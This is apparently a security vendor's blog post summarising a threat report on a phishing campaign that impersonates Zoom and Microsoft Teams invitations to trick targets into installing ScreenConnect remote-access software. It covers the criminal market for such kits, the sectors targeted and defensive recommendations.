It’s no longer just about stolen credentials.

An ongoing phishing campaign is targeting organizations across multiple industries, using sophisticated social engineering tactics to convincingly impersonate well-known videoconferencing platforms and deploy ConnectWise ScreenConnect for unauthorized system access.

Unlike traditional credential-harvesting attacks that steal login information, this campaign deceives targets into downloading legitimate remote monitoring and management (RMM) software, granting cybercriminals complete control over end-user devices.

This blog highlights key findings from our latest Threat Intelligence Report, Weaponizing Workplace Communications. It provides an overview of how these attacks unfold, why they are particularly dangerous, and what organizations must do to defend against them.

The attack methodology involves a carefully orchestrated sequence designed to exploit specific vulnerabilities in user behavior and organizational trust frameworks. By mimicking expected business workflows at each stage, attackers minimize red flags for targets and maintain the appearance of legitimate business activity throughout the process of establishing persistent, covert access.

The multi-stage attack is initiated via phishing emails that are designed to appear as routine business communications or friendly correspondence—leveraging familiar branding and timely context to maximize believability.

Among the most common tactics we observed in this campaign is attackers disguising the initial phishing email as a Zoom meeting invitation. The email’s subject line references a seemingly legitimate purpose—for example, “Meeting Invite - 2024 Tax Organizer SID:80526353241,” tying in timely tax season relevance to make the message feel even more genuine.

It features familiar Zoom branding and vague language meant to trick the recipient into clicking the "View Invitation" button. The email also originates from a compromised legitimate account, lending credibility and reducing the chance of detection by security tools.

In this particular instance, the attackers appear to have found a real Zoom notification email and modified only the call-to-action (CTA) to further enhance the illusion of authenticity. Once the CTA is clicked, the target is redirected to a malicious site where the second stage of the attack is initiated.

Zoom isn’t the only videoconferencing platform that bad actors opt to impersonate. We also uncovered malicious emails posing as Microsoft Teams invitations.

Similar to the fabricated Zoom emails, the fake Teams invitation was likely sent from a compromised account and features minimal text, along with a prominent call-to-action button. Clicking on the embedded link redirects the target to a malicious site that prompts them to download what appears to be the latest version of Microsoft Teams but is, in reality, ScreenConnect.

The deployment process reflects a deep understanding of the technical and psychological factors that influence user behavior. Attackers combine legitimate-looking interfaces with urgent messaging, minimizing suspicion while maximizing the likelihood of successful installation.

The primary tactic involves redirecting targets to a malicious site hosted at vercel.app. The page, mimicking Zoom's interface, claims the latest version of Zoom isn't installed and that the newest version will automatically download.

Within seconds, the site opens a new browser tab, prompting the download of Zoom.ClientSetup.exe. But this isn’t a legitimate Zoom installer. The file is, in fact, ScreenConnect.

The phishing page was likely built using Vercel's v0, an AI-powered tool that helps developers build complete user interfaces from text prompts—essentially functioning as an automated designer and front-end developer. v0 transforms basic ideas into production-ready layouts in minutes, eliminating the need for extensive coding and design expertise.

The most direct deployment method involves embedding actual ScreenConnect session links directly within phishing emails, creating an immediate pathway to system compromise. This technique exploits the fact that many organizations already have ScreenConnect installed for legitimate remote support purposes, allowing threat actors to bypass the installation process entirely.

When recipients click these links, they are immediately connected to a live ScreenConnect session controlled by the bad actor, assuming the software is already present on the target system. For targets without existing ScreenConnect installations, clicking these links triggers an automatic download prompt for the ScreenConnect client software.

The weaponization of ScreenConnect’s intended functionality enables threat actors to achieve comprehensive system access equivalent to that of a legitimate IT administrator. This means they can bypass security controls, navigate file systems, and establish a persistent presence across the organization’s infrastructure.

Once initial system access is established, cybercriminals frequently pivot to lateral phishing campaigns that leverage the compromised environment to target additional victims. They analyze communication patterns, identify high-value targets, and craft phishing messages that appear to originate from trusted internal sources.

Because bad actors can send phishing emails directly from the target’s actual account, they can bypass security controls that might flag external phishing attempts. These emails often invite colleagues, partners, and business contacts to join “urgent” video conferences or access “critical” shared documents, ultimately leading to additional ScreenConnect deployments.

Attackers may also use the compromised access to modify existing email threads, inserting malicious links into ongoing legitimate conversations about meetings or document sharing. This technique exploits the natural tendency for users to trust communications that appear to be continuations of established business discussions.

The rise in ScreenConnect-enabled cyberattacks is closely tied to a growing dark web ecosystem that supports the deployment, maintenance, and monetization of the remote management and monitoring tool. This underground economy caters to both novice and more advanced threat actors, offering a range of services from pre-packaged kits to fully customized infrastructure.

Cybercriminals can acquire ScreenConnect in numerous forms across forums, encrypted messaging apps, and anonymous web pages. One of the most popular offerings is the “ScreenConnect REVOLUTION PACK V2.0,” which includes a ScreenConnect agent bundled with hidden virtual network computing, wallet checkers, and a suite of security bypasses. This pack also includes features to hide attacker activity during remote sessions and restore connections even if domains are suspended, ensuring persistent access to compromised systems.

Other sellers offer turnkey deployments, such as full ScreenConnect infrastructure hosted on virtual private servers with HTTPS certificates, relay links, asset grouping, and role-based access. Vendors also provide “lifetime source kits,” enabling mid-tier attackers to host their own infrastructure and bypass traditional detection methods.

Beyond tooling, threat actors rely on bulletproof hosting providers, abuse trusted services like Cloudflare for obfuscation, and advertise loader kits that silently drop additional payloads after installation. Together, these offerings highlight a mature ecosystem that significantly lowers the barrier to entry and enables ScreenConnect-based compromises at scale.

Abnormal researchers discovered that this phishing campaign has targeted over 900 organizations across a broad spectrum of industries and geographic regions.

Education and religious organizations represent the largest segment at 14.4% of targets, followed by healthcare and pharmaceuticals at 9.7%, and financial services at 9.4%. This relatively even distribution across sectors—with no single industry representing more than 15% of targets—suggests attackers are prioritizing broad coverage over specialized targeting.

Geographically, most affected organizations were based in the United States, with notable presence from Canadian, Australian, and UK organizations—demonstrating the global scope of this threat campaign.

Given the diverse social engineering techniques employed, the emphasis on lateral phishing post-compromise, and the commoditized nature of ScreenConnect tools in criminal marketplaces, this activity appears primarily focused on establishing widespread network access for potential resale or follow-on monetization rather than targeted espionage or sector-specific data theft.

This campaign represents a significant evolution in cybercrime tactics. These ScreenConnect-enabled compromises exploit legitimate remote administration capabilities by weaponizing a trusted IT administration tool—one designed to grant IT professionals deep system access for troubleshooting and maintenance. This approach leaves minimal forensic evidence, significantly complicating detection and response efforts.

Simultaneously, the psychological sophistication of leveraging familiar videoconferencing contexts and established relationships capitalizes on fundamental human vulnerabilities, manipulating targets into granting attackers access to their devices.

The maturity of the supporting criminal ecosystem—evidenced by tiered service offerings, bulletproof hosting solutions, and comprehensive evasion techniques—indicates that ScreenConnect abuse is not an isolated phenomenon but rather a systematic exploitation of trust in modern business communications.

The campaign serves as a critical reminder that modern threats increasingly turn trusted systems against organizations rather than circumvent them. To counter this trend, security leaders must adopt a multi-layered defense strategy that combines people, processes, and technology.

• Implement Advanced Email Security: Deploy AI-powered solutions capable of detecting the complex social engineering tactics that bypass traditional controls.

• Enhance Endpoint Monitoring: Establish comprehensive monitoring for legitimate remote access tools, with a focus on unauthorized installations and suspicious usage patterns.

• Strengthen Security Awareness: Update training programs to reflect the evolving tactics of legitimate software abuse and the psychological manipulation techniques employed by modern attackers.

Taken together, these measures build resilience against the growing misuse of trusted tools like ScreenConnect and help reduce organizational exposure to campaigns that rely on both technical stealth and psychological manipulation.

To explore the full set of findings—including detailed attack methodologies, technical obfuscation tactics, and a complete breakdown of the dark web ecosystem powering this campaign—download the report.

Download Weaponizing Workplace Communications: How Videoconferencing Impersonation and AI Exploitation Enable Malicious ScreenConnect Deployment today.